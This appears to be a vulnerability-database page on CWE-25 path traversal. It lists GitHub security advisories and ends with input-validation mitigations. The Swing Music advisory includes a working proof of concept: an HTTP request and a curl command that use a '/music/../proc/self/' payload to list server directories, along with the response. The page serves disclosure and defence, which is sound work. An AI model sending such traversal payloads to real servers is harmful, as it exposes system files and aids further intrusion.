CWE-25
AllowedPath Traversal: '/../filedir'
Abstraction: Variant · Status: Incomplete
The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize "/../" sequences that can resolve to a location that is outside of that directory.
24 vulnerabilities reference this CWE, most recent first.
GHSA-PJ88-9XWW-GXMH
Vulnerability from github – Published: 2026-01-21 01:02 – Updated: 2026-01-21 01:02Summary
Swing Music's list_folders() function in the /folder/dir-browser endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.
Details
The @api.post("/dir-browser") endpoint lacks proper path validation and authorization checks:
- No authorization requirement: Any authenticated user can access the endpoint
- Improper path handling: The code attempts to prepend "/" to non-existent paths but this doesn't prevent traversal:
req_dir = pathlib.Path("../../../../etc") # → PosixPath('../../../../etc')
if not req_dir.exists(): # → False
req_dir = "/" / req_dir # → PosixPath('/../../../../etc')
PoC
- Create a non-admin user
- Authenticate as a non-admin user
- Send the following request:
POST /folder/dir-browser HTTP/1.1
Host: IP:1970
Content-Type: application/json
Cookie: access_token_cookie=non-admin-access-token
Connection: keep-alive
{"folder":"/music/../proc/self/", "tracks_only":false}
curl --path-as-is -i -s -k -X $'POST' -H $'Content-Type: application/json' -b $'access_token_cookie=non-admin-access-token' \
--data-binary $'{\"folder\":\"/music/../proc/self/\", \"tracks_only\":false}' \
$'http://IP:1970/folder/dir-browser'
- The response will list directories from
/proc/selfinstead of restricting to user-accessible paths:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 466
Vary: Accept-Encoding
Connection: Keep-Alive
{"folders":[{"name":"attr","path":"/music/../proc/self/attr"},{"name":"cwd","path":"/music/../proc/self/cwd"},{"name":"fd","path":"/music/../proc/self/fd"},{"name":"fdinfo","path":"/music/../proc/self/fdinfo"},{"name":"map_files","path":"/music/../proc/self/map_files"},{"name":"net","path":"/music/../proc/self/net"},{"name":"ns","path":"/music/../proc/self/ns"},{"name":"root","path":"/music/../proc/self/root"},{"name":"task","path":"/music/../proc/self/task"}]}
Impact
Information Disclosure: - Server filesystem structure and layout - Configuration file locations and names - User account names from directory listings - Software versions and installed packages - Log file locations and system paths
Additional Risks: - Preparation for further attacks (LFI, RCE) - Bypass of access control mechanisms - Exposure of sensitive directory structures
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "swingmusic"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23877"
],
"database_specific": {
"cwe_ids": [
"CWE-25"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-21T01:02:29Z",
"nvd_published_at": "2026-01-19T21:15:52Z",
"severity": "MODERATE"
},
"details": "### Summary\nSwing Music\u0027s `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.\n\n### Details\nThe `@api.post(\"/dir-browser\")` endpoint lacks proper path validation and authorization checks:\n- **No authorization requirement**: Any authenticated user can access the endpoint\n- **Improper path handling**: The code attempts to prepend \"/\" to non-existent paths but this doesn\u0027t prevent traversal:\n```python\nreq_dir = pathlib.Path(\"../../../../etc\") # \u2192 PosixPath(\u0027../../../../etc\u0027)\nif not req_dir.exists(): # \u2192 False\n req_dir = \"/\" / req_dir # \u2192 PosixPath(\u0027/../../../../etc\u0027)\n```\n\n### PoC\n1. Create a non-admin user\n2. Authenticate as a non-admin user\n3. Send the following request:\n```\nPOST /folder/dir-browser HTTP/1.1\nHost: IP:1970\nContent-Type: application/json\nCookie: access_token_cookie=non-admin-access-token\nConnection: keep-alive\n\n{\"folder\":\"/music/../proc/self/\", \"tracks_only\":false}\n```\n```bash\ncurl --path-as-is -i -s -k -X $\u0027POST\u0027 -H $\u0027Content-Type: application/json\u0027 -b $\u0027access_token_cookie=non-admin-access-token\u0027 \\\n --data-binary $\u0027{\\\"folder\\\":\\\"/music/../proc/self/\\\", \\\"tracks_only\\\":false}\u0027 \\\n $\u0027http://IP:1970/folder/dir-browser\u0027\n```\n4. The response will list directories from `/proc/self` instead of restricting to user-accessible paths:\n```\nHTTP/1.1 200 OK\nContent-Type: application/json\nContent-Length: 466\nVary: Accept-Encoding\nConnection: Keep-Alive\n\n{\"folders\":[{\"name\":\"attr\",\"path\":\"/music/../proc/self/attr\"},{\"name\":\"cwd\",\"path\":\"/music/../proc/self/cwd\"},{\"name\":\"fd\",\"path\":\"/music/../proc/self/fd\"},{\"name\":\"fdinfo\",\"path\":\"/music/../proc/self/fdinfo\"},{\"name\":\"map_files\",\"path\":\"/music/../proc/self/map_files\"},{\"name\":\"net\",\"path\":\"/music/../proc/self/net\"},{\"name\":\"ns\",\"path\":\"/music/../proc/self/ns\"},{\"name\":\"root\",\"path\":\"/music/../proc/self/root\"},{\"name\":\"task\",\"path\":\"/music/../proc/self/task\"}]}\n```\n\n### Impact\n\n**Information Disclosure:**\n- Server filesystem structure and layout\n- Configuration file locations and names\n- User account names from directory listings\n- Software versions and installed packages\n- Log file locations and system paths\n\n**Additional Risks:**\n- Preparation for further attacks (LFI, RCE)\n- Bypass of access control mechanisms\n- Exposure of sensitive directory structures",
"id": "GHSA-pj88-9xww-gxmh",
"modified": "2026-01-21T01:02:29Z",
"published": "2026-01-21T01:02:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/swingmx/swingmusic/security/advisories/GHSA-pj88-9xww-gxmh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23877"
},
{
"type": "WEB",
"url": "https://github.com/swingmx/swingmusic/commit/9a915ca62af1502b9550722df82f5d432cb73de3"
},
{
"type": "PACKAGE",
"url": "https://github.com/swingmx/swingmusic"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Swing Music has a Directory Traversal \u0026 Filesystem can be accessed by a non-admin user"
}
GHSA-QCXG-QFPX-CP4P
Vulnerability from github – Published: 2023-11-23 15:30 – Updated: 2026-05-20 15:35: Path Traversal: '/../filedir' vulnerability in Neutron IP Camera allows Absolute Path Traversal.This issue affects IP Camera: before b1130.1.0.1.
{
"affected": [],
"aliases": [
"CVE-2023-6118"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-25"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-23T15:15:10Z",
"severity": "HIGH"
},
"details": ": Path Traversal: \u0027/../filedir\u0027 vulnerability in Neutron IP Camera allows Absolute Path Traversal.This issue affects IP Camera: before b1130.1.0.1.",
"id": "GHSA-qcxg-qfpx-cp4p",
"modified": "2026-05-20T15:35:20Z",
"published": "2023-11-23T15:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6118"
},
{
"type": "WEB",
"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0658"
},
{
"type": "WEB",
"url": "https://www.usom.gov.tr/bildirim/tr-23-0658"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WJW4-PH2H-MW8Q
Vulnerability from github – Published: 2025-10-11 09:30 – Updated: 2025-10-11 09:30Denial of service (DoS) vulnerability in the office service. Successful exploitation of this vulnerability may affect availability.
{
"affected": [],
"aliases": [
"CVE-2025-58286"
],
"database_specific": {
"cwe_ids": [
"CWE-25"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-11T09:15:33Z",
"severity": "LOW"
},
"details": "Denial of service (DoS) vulnerability in the office service. Successful exploitation of this vulnerability may affect availability.",
"id": "GHSA-wjw4-ph2h-mw8q",
"modified": "2025-10-11T09:30:23Z",
"published": "2025-10-11T09:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58286"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2025/10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-X65R-RVGH-V43V
Vulnerability from github – Published: 2022-10-01 00:00 – Updated: 2026-02-25 21:31Multiple vulnerabilities in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to gain elevated privileges. These vulnerabilities are due to improper access controls on commands within the application CLI. An attacker could exploit these vulnerabilities by running a malicious command on the application CLI. A successful exploit could allow the attacker to execute arbitrary commands as the root user.
{
"affected": [],
"aliases": [
"CVE-2022-20775"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-25"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-09-30T19:15:00Z",
"severity": "HIGH"
},
"details": "Multiple vulnerabilities in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to gain elevated privileges. These vulnerabilities are due to improper access controls on commands within the application CLI. An attacker could exploit these vulnerabilities by running a malicious command on the application CLI. A successful exploit could allow the attacker to execute arbitrary commands as the root user.",
"id": "GHSA-x65r-rvgh-v43v",
"modified": "2026-02-25T21:31:14Z",
"published": "2022-10-01T00:00:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/orangecertcc/security-research/security/advisories/GHSA-wmjv-552v-pxjc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20775"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-priv-E6e8tEdF"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-priv-E6e8tEdF"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-20775"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-5.1
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
- Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20
Strategy: Input Validation
Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
No CAPEC attack patterns related to this CWE.